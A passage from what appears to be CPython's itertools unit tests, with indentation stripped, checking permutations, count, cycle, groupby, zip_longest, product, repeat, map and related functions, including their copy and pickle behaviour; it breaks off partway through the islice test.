self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for p in result:
self.assertEqual(len(p), r) # r-length permutations
self.assertEqual(len(set(p)), r) # no duplicate elements
self.assertTrue(all(e in values for e in p)) # elements taken from input iterable
self.assertEqual(result, list(permutations1(values, r))) # matches first pure python version
self.assertEqual(result, list(permutations2(values, r))) # matches second pure python version
if r == n:
self.assertEqual(result, list(permutations(values, None))) # test r as None
self.assertEqual(result, list(permutations(values))) # test default r
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, permutations(values, r)) # test pickling
@support.bigaddrspacetest
def test_permutations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
permutations("A", 2**30)
@support.impl_detail("tuple reuse is specific to CPython")
def test_permutations_tuple_reuse(self):
self.assertEqual(len(set(map(id, permutations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(permutations('abcde', 3))))), 1)
def test_combinatorics(self):
# Test relationships between product(), permutations(),
# combinations() and combinations_with_replacement().
for n in range(6):
s = 'ABCDEFG'[:n]
for r in range(8):
prod = list(product(s, repeat=r))
cwr = list(combinations_with_replacement(s, r))
perm = list(permutations(s, r))
comb = list(combinations(s, r))
# Check size
self.assertEqual(len(prod), n**r)
self.assertEqual(len(cwr), (fact(n+r-1) / fact(r)/ fact(n-1)) if n else (not r))
self.assertEqual(len(perm), 0 if r>n else fact(n) / fact(n-r))
self.assertEqual(len(comb), 0 if r>n else fact(n) / fact(r) / fact(n-r))
# Check lexicographic order without repeated tuples
self.assertEqual(prod, sorted(set(prod)))
self.assertEqual(cwr, sorted(set(cwr)))
self.assertEqual(perm, sorted(set(perm)))
self.assertEqual(comb, sorted(set(comb)))
# Check interrelationships
self.assertEqual(cwr, [t for t in prod if sorted(t)==list(t)]) # cwr: prods which are sorted
self.assertEqual(perm, [t for t in prod if len(set(t))==r]) # perm: prods with no dups
self.assertEqual(comb, [t for t in perm if sorted(t)==list(t)]) # comb: perms that are sorted
self.assertEqual(comb, [t for t in cwr if len(set(t))==r]) # comb: cwrs without dups
self.assertEqual(comb, list(filter(set(cwr).__contains__, perm))) # comb: perm that is a cwr
self.assertEqual(comb, list(filter(set(perm).__contains__, cwr))) # comb: cwr that is a perm
self.assertEqual(comb, sorted(set(cwr) & set(perm))) # comb: both a cwr and a perm
def test_compress(self):
self.assertEqual(list(compress(data='ABCDEF', selectors=[1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [0,0,0,0,0,0])), list(''))
self.assertEqual(list(compress('ABCDEF', [1,1,1,1,1,1])), list('ABCDEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1])), list('AC'))
self.assertEqual(list(compress('ABC', [0,1,1,1,1,1])), list('BC'))
n = 10000
data = chain.from_iterable(repeat(range(6), n))
selectors = chain.from_iterable(repeat((0, 1)))
self.assertEqual(list(compress(data, selectors)), [1,3,5] * n)
self.assertRaises(TypeError, compress, None, range(6)) # 1st arg not iterable
self.assertRaises(TypeError, compress, range(6), None) # 2nd arg not iterable
self.assertRaises(TypeError, compress, range(6)) # too few args
self.assertRaises(TypeError, compress, range(6), None) # too many args
# check copy, deepcopy, pickle
for op in [lambda a:copy.copy(a), lambda a:copy.deepcopy(a)] + picklecopiers:
for data, selectors, result1, result2 in [
('ABCDEF', [1,0,1,0,1,1], 'ACEF', 'CEF'),
('ABCDEF', [0,0,0,0,0,0], '', ''),
('ABCDEF', [1,1,1,1,1,1], 'ABCDEF', 'BCDEF'),
('ABCDEF', [1,0,1], 'AC', 'C'),
('ABC', [0,1,1,1,1,1], 'BC', 'C'),
]:
self.assertEqual(list(op(compress(data=data, selectors=selectors))), list(result1))
self.assertEqual(list(op(compress(data, selectors))), list(result1))
testIntermediate = compress(data, selectors)
if result1:
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)), list(result2))
def test_count(self):
self.assertEqual(lzip('abc',count()), [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(lzip('abc',count(3)), [('a', 3), ('b', 4), ('c', 5)])
self.assertEqual(take(2, lzip('abc',count(3))), [('a', 3), ('b', 4)])
self.assertEqual(take(2, zip('abc',count(-1))), [('a', -1), ('b', 0)])
self.assertEqual(take(2, zip('abc',count(-3))), [('a', -3), ('b', -2)])
self.assertRaises(TypeError, count, 2, 3, 4)
self.assertRaises(TypeError, count, 'a')
self.assertEqual(take(10, count(maxsize-5)),
list(range(maxsize-5, maxsize+5)))
self.assertEqual(take(10, count(-maxsize-5)),
list(range(-maxsize-5, -maxsize+5)))
self.assertEqual(take(3, count(3.25)), [3.25, 4.25, 5.25])
self.assertEqual(take(3, count(3.25-4j)), [3.25-4j, 4.25-4j, 5.25-4j])
self.assertEqual(take(3, count(Decimal('1.1'))),
[Decimal('1.1'), Decimal('2.1'), Decimal('3.1')])
self.assertEqual(take(3, count(Fraction(2, 3))),
[Fraction(2, 3), Fraction(5, 3), Fraction(8, 3)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(BIGINT)), [BIGINT, BIGINT+1, BIGINT+2])
c = count(3)
self.assertEqual(repr(c), 'count(3)')
next(c)
self.assertEqual(repr(c), 'count(4)')
c = count(-9)
self.assertEqual(repr(c), 'count(-9)')
next(c)
self.assertEqual(next(c), -8)
self.assertEqual(repr(count(10.25)), 'count(10.25)')
self.assertEqual(repr(count(10.0)), 'count(10.0)')
self.assertEqual(type(next(count(10.0))), float)
for i in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 10, sys.maxsize-5, sys.maxsize+5):
# Test repr
r1 = repr(count(i))
r2 = 'count(%r)'.__mod__(i)
self.assertEqual(r1, r2)
# check copy, deepcopy, pickle
for value in -3, 3, maxsize-5, maxsize+5:
c = count(value)
self.assertEqual(next(copy.copy(c)), value)
self.assertEqual(next(copy.deepcopy(c)), value)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, count(value))
#check proper internal error handling for large "step' sizes
count(1, maxsize+5); sys.exc_info()
def test_count_with_stride(self):
self.assertEqual(lzip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(lzip('abc',count(start=2,step=3)),
[('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(lzip('abc',count(step=-1)),
[('a', 0), ('b', -1), ('c', -2)])
self.assertRaises(TypeError, count, 'a', 'b')
self.assertEqual(lzip('abc',count(2,0)), [('a', 2), ('b', 2), ('c', 2)])
self.assertEqual(lzip('abc',count(2,1)), [('a', 2), ('b', 3), ('c', 4)])
self.assertEqual(lzip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(take(20, count(maxsize-15, 3)), take(20, range(maxsize-15, maxsize+100, 3)))
self.assertEqual(take(20, count(-maxsize-15, 3)), take(20, range(-maxsize-15,-maxsize+100, 3)))
self.assertEqual(take(3, count(10, maxsize+5)),
list(range(10, 10+3*(maxsize+5), maxsize+5)))
self.assertEqual(take(3, count(2, 1.25)), [2, 3.25, 4.5])
self.assertEqual(take(3, count(2, 3.25-4j)), [2, 5.25-4j, 8.5-8j])
self.assertEqual(take(3, count(Decimal('1.1'), Decimal('.1'))),
[Decimal('1.1'), Decimal('1.2'), Decimal('1.3')])
self.assertEqual(take(3, count(Fraction(2,3), Fraction(1,7))),
[Fraction(2,3), Fraction(17,21), Fraction(20,21)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(step=BIGINT)), [0, BIGINT, 2*BIGINT])
self.assertEqual(repr(take(3, count(10, 2.5))), repr([10, 12.5, 15.0]))
c = count(3, 5)
self.assertEqual(repr(c), 'count(3, 5)')
next(c)
self.assertEqual(repr(c), 'count(8, 5)')
c = count(-9, 0)
self.assertEqual(repr(c), 'count(-9, 0)')
next(c)
self.assertEqual(repr(c), 'count(-9, 0)')
c = count(-9, -3)
self.assertEqual(repr(c), 'count(-9, -3)')
next(c)
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(count(10.5, 1.25)), 'count(10.5, 1.25)')
self.assertEqual(repr(count(10.5, 1)), 'count(10.5)') # suppress step=1 when it's an int
self.assertEqual(repr(count(10.5, 1.00)), 'count(10.5, 1.0)') # do show float values lilke 1.0
self.assertEqual(repr(count(10, 1.00)), 'count(10, 1.0)')
c = count(10, 1.0)
self.assertEqual(type(next(c)), int)
self.assertEqual(type(next(c)), float)
for i in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 10, sys.maxsize-5, sys.maxsize+5):
for j in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 1, 10, sys.maxsize-5, sys.maxsize+5):
# Test repr
r1 = repr(count(i, j))
if j == 1:
r2 = ('count(%r)' % i)
else:
r2 = ('count(%r, %r)' % (i, j))
self.assertEqual(r1, r2)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, count(i, j))
def test_cycle(self):
self.assertEqual(take(10, cycle('abc')), list('abcabcabca'))
self.assertEqual(list(cycle('')), [])
self.assertRaises(TypeError, cycle)
self.assertRaises(TypeError, cycle, 5)
self.assertEqual(list(islice(cycle(gen3()),10)), [0,1,2,0,1,2,0,1,2,0])
# check copy, deepcopy, pickle
c = cycle('abc')
self.assertEqual(next(c), 'a')
#simple copy currently not supported, because __reduce__ returns
#an internal iterator
#self.assertEqual(take(10, copy.copy(c)), list('bcabcabcab'))
self.assertEqual(take(10, copy.deepcopy(c)), list('bcabcabcab'))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertEqual(take(10, pickle.loads(pickle.dumps(c, proto))),
list('bcabcabcab'))
next(c)
self.assertEqual(take(10, pickle.loads(pickle.dumps(c, proto))),
list('cabcabcabc'))
next(c)
next(c)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, cycle('abc'))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# test with partial consumed input iterable
it = iter('abcde')
c = cycle(it)
_ = [next(c) for i in range(2)] # consume 2 of 5 inputs
p = pickle.dumps(c, proto)
d = pickle.loads(p) # rebuild the cycle object
self.assertEqual(take(20, d), list('cdeabcdeabcdeabcdeab'))
# test with completely consumed input iterable
it = iter('abcde')
c = cycle(it)
_ = [next(c) for i in range(7)] # consume 7 of 5 inputs
p = pickle.dumps(c, proto)
d = pickle.loads(p) # rebuild the cycle object
self.assertEqual(take(20, d), list('cdeabcdeabcdeabcdeab'))
def test_cycle_setstate(self):
# Verify both modes for restoring state
# Mode 0 is efficient. It uses an incompletely consumed input
# iterator to build a cycle object and then passes in state with
# a list of previously consumed values. There is no data
# overlap between the two.
c = cycle('defg')
c.__setstate__((list('abc'), 0))
self.assertEqual(take(20, c), list('defgabcdefgabcdefgab'))
# Mode 1 is inefficient. It starts with a cycle object built
# from an iterator over the remaining elements in a partial
# cycle and then passes in state with all of the previously
# seen values (this overlaps values included in the iterator).
c = cycle('defg')
c.__setstate__((list('abcdefg'), 1))
self.assertEqual(take(20, c), list('defgabcdefgabcdefgab'))
# The first argument to setstate needs to be a tuple
with self.assertRaises(TypeError):
cycle('defg').__setstate__([list('abcdefg'), 0])
# The first argument in the setstate tuple must be a list
with self.assertRaises(TypeError):
c = cycle('defg')
c.__setstate__((tuple('defg'), 0))
take(20, c)
# The second argument in the setstate tuple must be an int
with self.assertRaises(TypeError):
cycle('defg').__setstate__((list('abcdefg'), 'x'))
self.assertRaises(TypeError, cycle('').__setstate__, ())
self.assertRaises(TypeError, cycle('').__setstate__, ([],))
def test_groupby(self):
# Check whether it accepts arguments correctly
self.assertEqual([], list(groupby([])))
self.assertEqual([], list(groupby([], key=id)))
self.assertRaises(TypeError, list, groupby('abc', []))
self.assertRaises(TypeError, groupby, None)
self.assertRaises(TypeError, groupby, 'abc', lambda x:x, 10)
# Check normal input
s = [(0, 10, 20), (0, 11,21), (0,12,21), (1,13,21), (1,14,22),
(2,15,22), (3,16,23), (3,17,23)]
dup = []
for k, g in groupby(s, lambda r:r[0]):
for elem in g:
self.assertEqual(k, elem[0])
dup.append(elem)
self.assertEqual(s, dup)
# Check normal pickled
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
dup = []
for k, g in pickle.loads(pickle.dumps(groupby(s, testR), proto)):
for elem in g:
self.assertEqual(k, elem[0])
dup.append(elem)
self.assertEqual(s, dup)
# Check nested case
dup = []
for k, g in groupby(s, testR):
for ik, ig in groupby(g, testR2):
for elem in ig:
self.assertEqual(k, elem[0])
self.assertEqual(ik, elem[2])
dup.append(elem)
self.assertEqual(s, dup)
# Check nested and pickled
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
dup = []
for k, g in pickle.loads(pickle.dumps(groupby(s, testR), proto)):
for ik, ig in pickle.loads(pickle.dumps(groupby(g, testR2), proto)):
for elem in ig:
self.assertEqual(k, elem[0])
self.assertEqual(ik, elem[2])
dup.append(elem)
self.assertEqual(s, dup)
# Check case where inner iterator is not used
keys = [k for k, g in groupby(s, testR)]
expectedkeys = set([r[0] for r in s])
self.assertEqual(set(keys), expectedkeys)
self.assertEqual(len(keys), len(expectedkeys))
# Check case where inner iterator is used after advancing the groupby
# iterator
s = list(zip('AABBBAAAA', range(9)))
it = groupby(s, testR)
_, g1 = next(it)
_, g2 = next(it)
_, g3 = next(it)
self.assertEqual(list(g1), [])
self.assertEqual(list(g2), [])
self.assertEqual(next(g3), ('A', 5))
list(it) # exhaust the groupby iterator
self.assertEqual(list(g3), [])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it = groupby(s, testR)
_, g = next(it)
next(it)
next(it)
self.assertEqual(list(pickle.loads(pickle.dumps(g, proto))), [])
# Exercise pipes and filters style
s = 'abracadabra'
# sort s | uniq
r = [k for k, g in groupby(sorted(s))]
self.assertEqual(r, ['a', 'b', 'c', 'd', 'r'])
# sort s | uniq -d
r = [k for k, g in groupby(sorted(s)) if list(islice(g,1,2))]
self.assertEqual(r, ['a', 'b', 'r'])
# sort s | uniq -c
r = [(len(list(g)), k) for k, g in groupby(sorted(s))]
self.assertEqual(r, [(5, 'a'), (2, 'b'), (1, 'c'), (1, 'd'), (2, 'r')])
# sort s | uniq -c | sort -rn | head -3
r = sorted([(len(list(g)) , k) for k, g in groupby(sorted(s))], reverse=True)[:3]
self.assertEqual(r, [(5, 'a'), (2, 'r'), (2, 'b')])
# iter.__next__ failure
class ExpectedError(Exception):
pass
def delayed_raise(n=0):
for i in range(n):
yield 'yo'
raise ExpectedError
def gulp(iterable, keyp=None, func=list):
return [func(g) for k, g in groupby(iterable, keyp)]
# iter.__next__ failure on outer object
self.assertRaises(ExpectedError, gulp, delayed_raise(0))
# iter.__next__ failure on inner object
self.assertRaises(ExpectedError, gulp, delayed_raise(1))
# __eq__ failure
class DummyCmp:
def __eq__(self, dst):
raise ExpectedError
s = [DummyCmp(), DummyCmp(), None]
# __eq__ failure on outer object
self.assertRaises(ExpectedError, gulp, s, func=id)
# __eq__ failure on inner object
self.assertRaises(ExpectedError, gulp, s)
# keyfunc failure
def keyfunc(obj):
if keyfunc.skip > 0:
keyfunc.skip -= 1
return obj
else:
raise ExpectedError
# keyfunc failure on outer object
keyfunc.skip = 0
self.assertRaises(ExpectedError, gulp, [None], keyfunc)
keyfunc.skip = 1
self.assertRaises(ExpectedError, gulp, [None, None], keyfunc)
def test_filter(self):
self.assertEqual(list(filter(isEven, range(6))), [0,2,4])
self.assertEqual(list(filter(None, [0,1,0,2,0])), [1,2])
self.assertEqual(list(filter(bool, [0,1,0,2,0])), [1,2])
self.assertEqual(take(4, filter(isEven, count())), [0,2,4,6])
self.assertRaises(TypeError, filter)
self.assertRaises(TypeError, filter, lambda x:x)
self.assertRaises(TypeError, filter, lambda x:x, range(6), 7)
self.assertRaises(TypeError, filter, isEven, 3)
self.assertRaises(TypeError, next, filter(range(6), range(6)))
# check copy, deepcopy, pickle
ans = [0,2,4]
c = filter(isEven, range(6))
self.assertEqual(list(copy.copy(c)), ans)
c = filter(isEven, range(6))
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = filter(isEven, range(6))
self.assertEqual(list(pickle.loads(pickle.dumps(c, proto))), ans)
next(c)
self.assertEqual(list(pickle.loads(pickle.dumps(c, proto))), ans[1:])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = filter(isEven, range(6))
self.pickletest(proto, c)
def test_filterfalse(self):
self.assertEqual(list(filterfalse(isEven, range(6))), [1,3,5])
self.assertEqual(list(filterfalse(None, [0,1,0,2,0])), [0,0,0])
self.assertEqual(list(filterfalse(bool, [0,1,0,2,0])), [0,0,0])
self.assertEqual(take(4, filterfalse(isEven, count())), [1,3,5,7])
self.assertRaises(TypeError, filterfalse)
self.assertRaises(TypeError, filterfalse, lambda x:x)
self.assertRaises(TypeError, filterfalse, lambda x:x, range(6), 7)
self.assertRaises(TypeError, filterfalse, isEven, 3)
self.assertRaises(TypeError, next, filterfalse(range(6), range(6)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, filterfalse(isEven, range(6)))
def test_zip(self):
# XXX This is rather silly now that builtin zip() calls zip()...
ans = [(x,y) for x, y in zip('abc',count())]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(list(zip('abc', range(6))), lzip('abc', range(6)))
self.assertEqual(list(zip('abcdef', range(3))), lzip('abcdef', range(3)))
self.assertEqual(take(3,zip('abcdef', count())), lzip('abcdef', range(3)))
self.assertEqual(list(zip('abcdef')), lzip('abcdef'))
self.assertEqual(list(zip()), lzip())
self.assertRaises(TypeError, zip, 3)
self.assertRaises(TypeError, zip, range(3), 3)
self.assertEqual([tuple(list(pair)) for pair in zip('abc', 'def')],
lzip('abc', 'def'))
self.assertEqual([pair for pair in zip('abc', 'def')],
lzip('abc', 'def'))
@support.impl_detail("tuple reuse is specific to CPython")
def test_zip_tuple_reuse(self):
ids = list(map(id, zip('abc', 'def')))
self.assertEqual(min(ids), max(ids))
ids = list(map(id, list(zip('abc', 'def'))))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
# check copy, deepcopy, pickle
ans = [(x,y) for x, y in copy.copy(zip('abc',count()))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
ans = [(x,y) for x, y in copy.deepcopy(zip('abc',count()))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
ans = [(x,y) for x, y in pickle.loads(pickle.dumps(zip('abc',count()), proto))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
testIntermediate = zip('abc',count())
next(testIntermediate)
ans = [(x,y) for x, y in pickle.loads(pickle.dumps(testIntermediate, proto))]
self.assertEqual(ans, [('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, zip('abc', count()))
def test_ziplongest(self):
for args in [
['abc', range(6)],
[range(6), 'abc'],
[range(1000), range(2000,2100), range(3000,3050)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500), range(0)],
]:
target = [tuple([arg[i] if i < len(arg) else None for arg in args])
for i in range(max(map(len, args)))]
self.assertEqual(list(zip_longest(*args)), target)
self.assertEqual(list(zip_longest(*args, **{})), target)
target = [tuple((e is None and 'X' or e) for e in t) for t in target] # Replace None fills with 'X'
self.assertEqual(list(zip_longest(*args, **dict(fillvalue='X'))), target)
self.assertEqual(take(3,zip_longest('abcdef', count())), list(zip('abcdef', range(3)))) # take 3 from infinite input
self.assertEqual(list(zip_longest()), list(zip()))
self.assertEqual(list(zip_longest([])), list(zip([])))
self.assertEqual(list(zip_longest('abcdef')), list(zip('abcdef')))
self.assertEqual(list(zip_longest('abc', 'defg', **{})),
list(zip(list('abc')+[None], 'defg'))) # empty keyword dict
self.assertRaises(TypeError, zip_longest, 3)
self.assertRaises(TypeError, zip_longest, range(3), 3)
for stmt in [
"zip_longest('abc', fv=1)",
"zip_longest('abc', fillvalue=1, bogus_keyword=None)",
]:
try:
eval(stmt, globals(), locals())
except TypeError:
pass
else:
self.fail('Did not raise Type in: ' + stmt)
self.assertEqual([tuple(list(pair)) for pair in zip_longest('abc', 'def')],
list(zip('abc', 'def')))
self.assertEqual([pair for pair in zip_longest('abc', 'def')],
list(zip('abc', 'def')))
@support.impl_detail("tuple reuse is specific to CPython")
def test_zip_longest_tuple_reuse(self):
ids = list(map(id, zip_longest('abc', 'def')))
self.assertEqual(min(ids), max(ids))
ids = list(map(id, list(zip_longest('abc', 'def'))))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
def test_zip_longest_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, zip_longest("abc", "def"))
self.pickletest(proto, zip_longest("abc", "defgh"))
self.pickletest(proto, zip_longest("abc", "defgh", fillvalue=1))
self.pickletest(proto, zip_longest("", "defgh"))
def test_zip_longest_bad_iterable(self):
exception = TypeError()
class BadIterable:
def __iter__(self):
raise exception
with self.assertRaises(TypeError) as cm:
zip_longest(BadIterable())
self.assertIs(cm.exception, exception)
def test_bug_7244(self):
class Repeater:
# this class is similar to itertools.repeat
def __init__(self, o, t, e):
self.o = o
self.t = int(t)
self.e = e
def __iter__(self): # its iterator is itself
return self
def __next__(self):
if self.t > 0:
self.t -= 1
return self.o
else:
raise self.e
# Formerly this code in would fail in debug mode
# with Undetected Error and Stop Iteration
r1 = Repeater(1, 3, StopIteration)
r2 = Repeater(2, 4, StopIteration)
def run(r1, r2):
result = []
for i, j in zip_longest(r1, r2, fillvalue=0):
with support.captured_output('stdout'):
print((i, j))
result.append((i, j))
return result
self.assertEqual(run(r1, r2), [(1,2), (1,2), (1,2), (0,2)])
# Formerly, the RuntimeError would be lost
# and StopIteration would stop as expected
r1 = Repeater(1, 3, RuntimeError)
r2 = Repeater(2, 4, StopIteration)
it = zip_longest(r1, r2, fillvalue=0)
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertRaises(RuntimeError, next, it)
def test_pairwise(self):
self.assertEqual(list(pairwise('')), [])
self.assertEqual(list(pairwise('a')), [])
self.assertEqual(list(pairwise('ab')),
[('a', 'b')]),
self.assertEqual(list(pairwise('abcde')),
[('a', 'b'), ('b', 'c'), ('c', 'd'), ('d', 'e')])
self.assertEqual(list(pairwise(range(10_000))),
list(zip(range(10_000), range(1, 10_000))))
with self.assertRaises(TypeError):
pairwise() # too few arguments
with self.assertRaises(TypeError):
pairwise('abc', 10) # too many arguments
with self.assertRaises(TypeError):
pairwise(iterable='abc') # keyword arguments
with self.assertRaises(TypeError):
pairwise(None) # non-iterable argument
def test_product(self):
for args, result in [
([], [()]), # zero iterables
(['ab'], [('a',), ('b',)]), # one iterable
([range(2), range(3)], [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]), # two iterables
([range(0), range(2), range(3)], []), # first iterable with zero length
([range(2), range(0), range(3)], []), # middle iterable with zero length
([range(2), range(3), range(0)], []), # last iterable with zero length
]:
self.assertEqual(list(product(*args)), result)
for r in range(4):
self.assertEqual(list(product(*(args*r))),
list(product(*args, **dict(repeat=r))))
self.assertEqual(len(list(product(*[range(7)]*6))), 7**6)
self.assertRaises(TypeError, product, range(6), None)
def product1(*args, **kwds):
pools = list(map(tuple, args)) * kwds.get('repeat', 1)
n = len(pools)
if n == 0:
yield ()
return
if any(len(pool) == 0 for pool in pools):
return
indices = [0] * n
yield tuple(pool[i] for pool, i in zip(pools, indices))
while 1:
for i in reversed(range(n)): # right to left
if indices[i] == len(pools[i]) - 1:
continue
indices[i] += 1
for j in range(i+1, n):
indices[j] = 0
yield tuple(pool[i] for pool, i in zip(pools, indices))
break
else:
return
def product2(*args, **kwds):
'Pure python version used in docs'
pools = list(map(tuple, args)) * kwds.get('repeat', 1)
result = [[]]
for pool in pools:
result = [x+[y] for x in result for y in pool]
for prod in result:
yield tuple(prod)
argtypes = ['', 'abc', '', range(0), range(4), dict(a=1, b=2, c=3),
set('abcdefg'), range(11), tuple(range(13))]
for i in range(100):
args = [random.choice(argtypes) for j in range(random.randrange(5))]
expected_len = prod(map(len, args))
self.assertEqual(len(list(product(*args))), expected_len)
self.assertEqual(list(product(*args)), list(product1(*args)))
self.assertEqual(list(product(*args)), list(product2(*args)))
args = map(iter, args)
self.assertEqual(len(list(product(*args))), expected_len)
@support.bigaddrspacetest
def test_product_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
product(*(['ab']*2**5), repeat=2**25)
@support.impl_detail("tuple reuse is specific to CPython")
def test_product_tuple_reuse(self):
self.assertEqual(len(set(map(id, product('abc', 'def')))), 1)
self.assertNotEqual(len(set(map(id, list(product('abc', 'def'))))), 1)
def test_product_pickling(self):
# check copy, deepcopy, pickle
for args, result in [
([], [()]), # zero iterables
(['ab'], [('a',), ('b',)]), # one iterable
([range(2), range(3)], [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]), # two iterables
([range(0), range(2), range(3)], []), # first iterable with zero length
([range(2), range(0), range(3)], []), # middle iterable with zero length
([range(2), range(3), range(0)], []), # last iterable with zero length
]:
self.assertEqual(list(copy.copy(product(*args))), result)
self.assertEqual(list(copy.deepcopy(product(*args))), result)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, product(*args))
def test_product_issue_25021(self):
# test that indices are properly clamped to the length of the tuples
p = product((1, 2),(3,))
p.__setstate__((0, 0x1000)) # will access tuple element 1 if not clamped
self.assertEqual(next(p), (2, 3))
# test that empty tuple in the list will result in an immediate StopIteration
p = product((1, 2), (), (3,))
p.__setstate__((0, 0, 0x1000)) # will access tuple element 1 if not clamped
self.assertRaises(StopIteration, next, p)
def test_repeat(self):
self.assertEqual(list(repeat(object='a', times=3)), ['a', 'a', 'a'])
self.assertEqual(lzip(range(3),repeat('a')),
[(0, 'a'), (1, 'a'), (2, 'a')])
self.assertEqual(list(repeat('a', 3)), ['a', 'a', 'a'])
self.assertEqual(take(3, repeat('a')), ['a', 'a', 'a'])
self.assertEqual(list(repeat('a', 0)), [])
self.assertEqual(list(repeat('a', -3)), [])
self.assertRaises(TypeError, repeat)
self.assertRaises(TypeError, repeat, None, 3, 4)
self.assertRaises(TypeError, repeat, None, 'a')
r = repeat(1+0j)
self.assertEqual(repr(r), 'repeat((1+0j))')
r = repeat(1+0j, 5)
self.assertEqual(repr(r), 'repeat((1+0j), 5)')
list(r)
self.assertEqual(repr(r), 'repeat((1+0j), 0)')
# check copy, deepcopy, pickle
c = repeat(object='a', times=10)
self.assertEqual(next(c), 'a')
self.assertEqual(take(2, copy.copy(c)), list('a' * 2))
self.assertEqual(take(2, copy.deepcopy(c)), list('a' * 2))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, repeat(object='a', times=10))
def test_repeat_with_negative_times(self):
self.assertEqual(repr(repeat('a', -1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', -2)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-2)), "repeat('a', 0)")
def test_map(self):
self.assertEqual(list(map(operator.pow, range(3), range(1,7))),
[0**1, 1**2, 2**3])
self.assertEqual(list(map(tupleize, 'abc', range(5))),
[('a',0),('b',1),('c',2)])
self.assertEqual(list(map(tupleize, 'abc', count())),
[('a',0),('b',1),('c',2)])
self.assertEqual(take(2,map(tupleize, 'abc', count())),
[('a',0),('b',1)])
self.assertEqual(list(map(operator.pow, [])), [])
self.assertRaises(TypeError, map)
self.assertRaises(TypeError, list, map(None, range(3), range(3)))
self.assertRaises(TypeError, map, operator.neg)
self.assertRaises(TypeError, next, map(10, range(5)))
self.assertRaises(ValueError, next, map(errfunc, [4], [5]))
self.assertRaises(TypeError, next, map(onearg, [4], [5]))
# check copy, deepcopy, pickle
ans = [('a',0),('b',1),('c',2)]
c = map(tupleize, 'abc', count())
self.assertEqual(list(copy.copy(c)), ans)
c = map(tupleize, 'abc', count())
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = map(tupleize, 'abc', count())
self.pickletest(proto, c)
def test_starmap(self):
self.assertEqual(list(starmap(operator.pow, zip(range(3), range(1,7)))),
[0**1, 1**2, 2**3])
self.assertEqual(take(3, starmap(operator.pow, zip(count(), count(1)))),
[0**1, 1**2, 2**3])
self.assertEqual(list(starmap(operator.pow, [])), [])
self.assertEqual(list(starmap(operator.pow, [iter([4,5])])), [4**5])
self.assertRaises(TypeError, list, starmap(operator.pow, [None]))
self.assertRaises(TypeError, starmap)
self.assertRaises(TypeError, starmap, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, starmap(10, [(4,5)]))
self.assertRaises(ValueError, next, starmap(errfunc, [(4,5)]))
self.assertRaises(TypeError, next, starmap(onearg, [(4,5)]))
# check copy, deepcopy, pickle
ans = [0**1, 1**2, 2**3]
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.assertEqual(list(copy.copy(c)), ans)
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.pickletest(proto, c)
def test_islice(self):
for args in [ # islice(args) should agree with range(args)
(10, 20, 3),
(10, 3, 20),
(10, 20),
(10, 10),
(10, 3),
(20,)
]:
self.assertEqual(list(islice(range(100), *args)),
